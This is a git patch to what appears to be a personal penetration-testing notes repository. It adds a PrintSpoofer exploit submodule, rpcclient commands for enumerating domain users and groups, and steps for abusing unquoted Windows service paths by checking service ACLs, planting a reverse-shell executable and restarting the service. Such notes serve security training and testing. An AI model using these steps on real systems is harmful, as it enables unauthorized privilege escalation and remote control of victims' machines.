From 32fa6a672b29b24a186d4d2c47e22aa08c8efec0 Mon Sep 17 00:00:00 2001
From: whx <stefan@stefan.works>
Date: Sat, 26 Feb 2022 01:01:44 +0100
Subject: [PATCH] bump

---
 .gitmodules                           |  3 +++
 enumeration/windows/bloodhound.md     |  3 +++
 enumeration/windows/rpcclient.md      | 10 ++++++++++
 exploit/windows/docs/unquoted_path.md | 24 ++++++++++++++++++++++++
 exploit/windows/printspoofer          |  1 +
 5 files changed, 41 insertions(+)
 create mode 100644 enumeration/windows/bloodhound.md
 create mode 100644 enumeration/windows/rpcclient.md
 create mode 160000 exploit/windows/printspoofer

diff --git a/.gitmodules b/.gitmodules
index 5ca311d..06838ac 100644
--- a/.gitmodules
+++ b/.gitmodules
@@ -136,3 +136,6 @@
 [submodule "stego/stego-toolkit"]
 	path = stego/stego-toolkit
 	url = https://github.com/DominicBreuker/stego-toolkit.git
+[submodule "exploit/windows/printspoofer"]
+	path = exploit/windows/printspoofer
+	url = https://github.com/dievus/printspoofer.git
diff --git a/enumeration/windows/bloodhound.md b/enumeration/windows/bloodhound.md
new file mode 100644
index 0000000..3d92bb8
--- /dev/null
+++ b/enumeration/windows/bloodhound.md
@@ -0,0 +1,3 @@
+# Bloodhound
+
+* DNS
diff --git a/enumeration/windows/rpcclient.md b/enumeration/windows/rpcclient.md
new file mode 100644
index 0000000..315e8a2
--- /dev/null
+++ b/enumeration/windows/rpcclient.md
@@ -0,0 +1,10 @@
+# RPCclient
+
+* Enumerate users and groups
+
+```sh
+rpcclient <domain> <users>
+rpcclient $> enumdomusers
+...
+rpcclient $> enumdomgroups
+```
diff --git a/exploit/windows/docs/unquoted_path.md b/exploit/windows/docs/unquoted_path.md
index 0e89282..5ddd0f5 100644
--- a/exploit/windows/docs/unquoted_path.md
+++ b/exploit/windows/docs/unquoted_path.md
@@ -14,3 +14,27 @@ copy C:\shell.exe "C:\Program Files\Unquoted Path Service\Common.exe"
 net start <service>
 ```
 
+## Intel about Service
+
+* Access should contain writeable
+```sh
+Get-Acl -Path <path> | Format-List
+```
+
+* Save the script [Get-ServiceAcl.ps1](https://rohnspowershellblog.wordpress.com/2013/03/19/viewing-service-acls/) and `Import-Module Get-ServiceAcl.ps1`
+
+* Check `ServiceRights` via
+```sh
+"<servicename>" | Get-ServiceAcl | select ExpandProperty Access
+```
+
+## Interacting with the Service
+
+* Upload msfvenom shell to the writeable path, setup listener and 
+```sh
+sc start "servicename"
+Stop-Service -name "servicename"
+Start-Service -name "servicename"
+```
+
+
diff --git a/exploit/windows/printspoofer b/exploit/windows/printspoofer
new file mode 160000
index 0000000..29a9e27
--- /dev/null
+++ b/exploit/windows/printspoofer
@@ -0,0 +1 @@
+Subproject commit 29a9e27f5418317bd5f4560ccfebcb65ca181b32